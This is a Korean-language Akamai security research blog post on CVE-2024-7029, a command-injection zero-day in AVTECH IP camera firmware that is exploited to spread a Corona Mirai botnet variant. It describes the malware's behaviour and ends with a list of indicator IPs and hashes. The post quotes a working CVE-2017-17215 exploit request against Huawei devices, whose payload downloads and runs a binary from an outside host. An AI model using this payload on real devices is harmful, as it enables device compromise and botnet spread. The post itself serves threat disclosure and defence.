클라우드 컴퓨팅이 필요하신가요? 지금 시작해보세요

보안 취약점을 주의하세요: 제로데이를 통해 유포되는 Corona Mirai 봇넷

Akamai Wave Blue

에 의해 작성

Kyle Lefton, Larry Cashdollar, 그리고 Aline Eliovich

August 28, 2024

Akamai 블루 웨이브

에 의해 작성

Kyle Lefton

카일 레프톤(Kyle Lefton)은 Akamai 보안 인텔리전스 대응팀의 보안 리서치 인턴입니다. 국방부의 인텔리전스 애널리스트였던 카일은 사이버 방어, 위협 리서치, 카운터 인텔리전스 부문에서 다년간 경력을 쌓았습니다. 자신 있는 분야는 새로운 위협 조사, 취약점 리서치, 위협 그룹 매핑 분야입니다. 여가 시간에는 친구, 가족과 함께 시간을 보내고 전략 게임과 아웃도어 하이킹을 즐깁니다.

Larry Cashdollar

에 의해 작성

Larry Cashdollar

래리 W. 캐시달러(Larry W. Cashdollar)는 보안 분야에서 18년 이상 취약점 연구원으로 활동해 왔으며 현재 Akamai Technologies의 보안 사고 대응 팀의 일원입니다. 래리는 서던 메인 대학교에서 컴퓨터 공학을 전공했습니다. 래리는 150개 이상의 CVE를 문서화했으며 BSides Boston, OWASP Rhode Island, Defcon에서 자신의 연구 내용에 대한 프레젠테이션을 진행했습니다. 그는 여가 시간에 야외를 즐기고 미니 자전거 엔진을 재조립합니다.

알린 엘리오비치(Aline Eliovich)

에 의해 작성

Aline Eliovich

보안 분야에서 6년 경력을 쌓은 알린 엘리오비치(Aline Eliovich)는 현재 Akamai의 보안 인텔리전스 대응팀에서 연구원으로 근무하고 있습니다. 홀론 기술 연구소에서 컴퓨터 공학을 전공했습니다. 알린은 리서치에 다양한 OSINT(Open Source Intelligence) 방법을 사용하는 것을 즐깁니다.

공격자는 이 취약점을 악용해 표적 시스템에서 원격 코드를 실행할 수 있습니다.
공격자는 이 취약점을 악용해 표적 시스템에서 원격 코드를 실행할 수 있습니다.

편집 및 추가 설명: 트리샤 하워드(Tricia Howard)
카피 편집: 마리아 블라삭(Maria Vlasak)

핵심 요약

  • Akamai 보안 인텔리전스 대응팀(SIRT)은 이전에 악용된 여러 취약점을 악용하는 봇넷 캠페인을 관찰했으며 제로데이 취약점도 발견했습니다.

  • CVE-2024-7029(알린 엘리오비치(Aline Eliovich)가 발견)는 AVTECH 폐쇄 회로 텔레비전(CCTV) 카메라의 밝기 함수에서 발견된 명령어 인젝션 취약점으로, 원격 코드 실행(RCE)을 허용합니다.

  • 이 봇넷은 일단 감염되면 최소 2020년부터 발견된 코로나19 바이러스를 참조하는 문자열 이름을 가진 Mirai 변종을 유포합니다.  

  • Akamai는 이러한 위협으로부터 방어하는 데 도움이 되는 감염 지표(IOC) 목록을 포함했습니다.

서론

Akamai SIRT는 자신과 고객의 온라인 라이프를 안전하게 지키기 위해 수많은 내부 및 외부 인텔리전스 피드를 모니터링하고 참여합니다. Akamai는 글로벌 허니팟 네트워크를 통해 오늘 논의하는 CVE-2024-7029( 알린 엘리오비치(Aline Eliovich)가 발견)을 포함해 여러 가지 활성 위협을 발견했습니다.

이 RCE 제로데이 취약점은 AVTECH IP 카메라 디바이스의 밝기 함수에서 발견되었으며, 명령어 인젝션을 통해 표적 시스템에 Mirai 변종을 유포시킵니다. 이는 상승된 권한(실행 프로세스 소유자)을 사용해 원격으로 실행될 수 있습니다. 2024년 8월, CISA는 공격 복잡성 부족, 원격 악용, 알려진 공개 악용을 이유로 이 취약점에 대해 ICS(Industrial Control System) 경고 를 발령했습니다.

이 봇넷 캠페인은 CVE-2024-7029 외에도 여러 개의 AVTECH 취약점, Hadoop YARN RCE, CVE-2014-8361, CVE-2017-17215등 여러 취약점을 표적으로 삼습니다. 이는 악의적인 목적을 달성하기 위해 아직 패치되지 않은 취약점을 사용하는 공격자들의 경향과 일맥상통합니다.

지금이 패치를 적용할 때

이러한 취약점 중 상당수가 RCE 요소를 포함하고 있기 때문에 지금이 바로 패치를 적용해야 할 때입니다. 더 큰 문제는 공식적인 CVE 지정이 없기 때문에 패치는커녕 버그를 추적하기도 어렵다는 점입니다.

이 블로그 게시물에서는 제로데이 공격 과 그 영향을 설명하고, 탐지 또는 방어를 용이하게 하기 위한 포괄적인 IOC 목록을 제시합니다.

CVE-2024-7029란?

간단히 말해, CVE-2024-7029는 AVTECH IP 카메라 디바이스의 취약점으로, “action=” 매개변수의 “brightness“ 인수가 명령어 인젝션을 허용합니다. Akamai가 관찰한 공격자는 이 취약점을 악용해 코로나19 바이러스를 참조하는 문자열 이름을 가진 Mirai 변종을 유포했습니다.

활성 상태 기간

2024년 3월 18일에 처음으로 활발한 캠페인이 시작되었지만, 분석 결과 2023년 12월부터 이 변종에 대한 활동이 시작된 것으로 나타났습니다. CVE-2024-7029에 대한 개념 증명(PoC)은 적어도 2019년부터 공개 되었지만 2024년 8월까지 제대로 된 CVE 가 할당된 적이 없습니다.

영향을 받는 대상

AVTECH IP 카메라 디바이스의 이 취약점은 최대 AVM1203 펌웨어 버전 FullImg-1023-1007-1011-1009 등에 영향을 줍니다. 문제의 모델은 이미 수년 전에 생산이 중단되었지만, CISA는 경고를 통해 이러한 디바이스가 전 세계적으로 교통 당국 및 기타 중요 인프라 기관 등에서 여전히 사용되고 있다고 언급했습니다.

작동 방식

이 취약점은 원래 허니팟 로그를 조사하면서 발견되었습니다. 그림 1에는 명확성을 위해 디코딩된 URL이 표시되어 있습니다.

디코딩된 페이로드 그림 1: 악용 시도에서 디코딩된 페이로드 본문

취약점은 /cgi-bin/supervisor/Factory.cgi 파일 내의 밝기 함수에 존재합니다(그림 2).

이 취약점은 밝기 기능에 존재합니다 그림 2: 악용의 PoC

향후 예측

Akamai가 관찰한 악용 사례에서 기본적으로 발생한 것은 이렇습니다. 공격자는 이 취약점을 악용해 표적 시스템에서 원격 코드를 실행할 수 있다라는 것입니다.

그림 3은 이 취약점을 악용해 자바스크립트 파일을 다운로드하고 실행해 주요 멀웨어 페이로드를 패치하고 로드하는 공격자의 예시입니다. 다른 많은 봇넷과 마찬가지로이 봇넷도 Mirai 멀웨어의 변종을 표적에 유포하고 있습니다.

그림 3은 이 취약점을 악용해 자바스크립트 파일을 다운로드하고 실행해 주요 멀웨어 페이로드를 패치하고 로드하는 공격자의 예시입니다. 그림 3: 자바스크립트 다운로더의 문자열

이 경우 봇넷은 코로나19 바이러스와 관련하여 2020년 초 다른 벤더사 가 참조한 Corona Mirai 변종을 사용하고 있을 가능성이 높습니다. 

실행 시 이 멀웨어는 포트 23, 2323, 37215에서 Telnet을 통해 많은 수의 호스트에 연결됩니다. 또한, ‘Corona’ 문자열을 감염된 호스트의 콘솔에 인쇄합니다(그림 4).

또한, ‘Corona’ 문자열을 감염된 호스트의 콘솔에 인쇄합니다(그림 4).
 또한, ‘Corona’ 문자열을 감염된 호스트의 콘솔에 인쇄합니다(그림 4). 그림 4: 콘솔에 아웃풋을 표시하는 멀웨어의 실행

멀웨어 샘플의 문자열을 정적 분석한 결과, CVE-2017-17215의 영향을 받는 Huawei 디바이스를 악용하려는 시도로 /ctrlt/DeviceUpgrade_1 경로를 표적으로 삼는 것으로 나타났습니다. 샘플에는 두 개의 하드코딩된 명령 및 제어 IP 주소가 있는데, 그중 하나는 CVE-2017-17215 악용 코드의 일부입니다(그림 5). 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

그림 5: CVE-2017-17215 /ctrlt/DeviceUpgrade_1 코드 악용

이 봇넷은 또한 Hadoop YARN RCE, CVE-2014-8361, CVE-2017-17215를 비롯한 여러 다른 취약점을 노렸습니다. 이러한 취약점이 인터넷에서 여러 번 악용되는 것이 관찰되었고 계속해서 성공하고 있습니다.

결론

공식적인 CVE 지정이 없는 취약점도 기업에 실제로 심각한 위협이 될 수 있습니다. 이러한 봇넷을 운영하는 악의적인 공격자들은 새로운 취약점이나 잘 알려지지 않은 취약점을 사용해 멀웨어를 확산시킵니다. CVE-2024-7029는 후자를 사용하는 또 다른 예시로, SIRT가 관찰한 공격 트렌드가 점점 더 대중화되고 있습니다.

공개 악용이나 사용 가능한 PoC가 있는 취약점에는 공식적으로 CVE가 지정되지 않은 경우가 많으며, 경우에 따라서는 패치가 적용되지 않은 채로 남아 있는 경우도 있습니다. 특히 위협에 사용 가능한 패치가 없는 경우 패치 우선순위를 관리하는 것이 매우 어렵습니다. 위협을 해결할 방법이 없다면 하드웨어와 소프트웨어를 폐기하는 것이 보안 리스크를 방어하고 규제 과징금의 리스크를 낮추는 데 권장되는 방법입니다.

Akamai와 항상 함께하세요

Akamai SIRT는 고객, 동료 직원 및 보안 커뮤니티 전체의 안전을 위해 CVE-2024-7029와 같은 위협을 계속 발견하고 모니터링하고 보고할 것입니다. 최신 연구 소식을 확인하려면 소셜 미디어 에서 팔로우하거나 보안 리서치 페이지를 방문하세요.

IOCS

IPv4 주소
93.123.39[.]72
93.123.39[.]87
93.123.39[.]111
147.78.103[.]177
185.216.70[.]37
94.156.8[.]185
93.123.39[.]173
74.50.81[.]158
94.156.71[.]74
93.123.85[.]213
185.216.70[.]142
45.66.231[.]148
185.216.70[.]79
SHA256 해시
15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (“r”)
c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 (“x86”)
b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af  (“sh”)
e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57  (“mips”)
9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656  (“r”)
f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3  (“mips”)
22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab  (“sh”
135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2  (“r”)
6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82  (“r”)
947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212  (“r”)
8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 (“r”)
5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1  (“r”)
372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92  (“r”)
3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280  (“sh”)
40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2  (“r”)
4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff  (“x86”)
25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91  (“r”)
cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c  (“x86”)
774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b  (“x86”)
06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499  (“r”)
4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1  (“sh”)
c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c  (“x86”)
0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 (“x86”)
2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582  (“x86”)
5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d (“x86”)


Akamai Wave Blue

에 의해 작성

Kyle Lefton, Larry Cashdollar, 그리고 Aline Eliovich

August 28, 2024

Akamai 블루 웨이브

에 의해 작성

Kyle Lefton

카일 레프톤(Kyle Lefton)은 Akamai 보안 인텔리전스 대응팀의 보안 리서치 인턴입니다. 국방부의 인텔리전스 애널리스트였던 카일은 사이버 방어, 위협 리서치, 카운터 인텔리전스 부문에서 다년간 경력을 쌓았습니다. 자신 있는 분야는 새로운 위협 조사, 취약점 리서치, 위협 그룹 매핑 분야입니다. 여가 시간에는 친구, 가족과 함께 시간을 보내고 전략 게임과 아웃도어 하이킹을 즐깁니다.

Larry Cashdollar

에 의해 작성

Larry Cashdollar

래리 W. 캐시달러(Larry W. Cashdollar)는 보안 분야에서 18년 이상 취약점 연구원으로 활동해 왔으며 현재 Akamai Technologies의 보안 사고 대응 팀의 일원입니다. 래리는 서던 메인 대학교에서 컴퓨터 공학을 전공했습니다. 래리는 150개 이상의 CVE를 문서화했으며 BSides Boston, OWASP Rhode Island, Defcon에서 자신의 연구 내용에 대한 프레젠테이션을 진행했습니다. 그는 여가 시간에 야외를 즐기고 미니 자전거 엔진을 재조립합니다.

알린 엘리오비치(Aline Eliovich)

에 의해 작성

Aline Eliovich

보안 분야에서 6년 경력을 쌓은 알린 엘리오비치(Aline Eliovich)는 현재 Akamai의 보안 인텔리전스 대응팀에서 연구원으로 근무하고 있습니다. 홀론 기술 연구소에서 컴퓨터 공학을 전공했습니다. 알린은 리서치에 다양한 OSINT(Open Source Intelligence) 방법을 사용하는 것을 즐깁니다.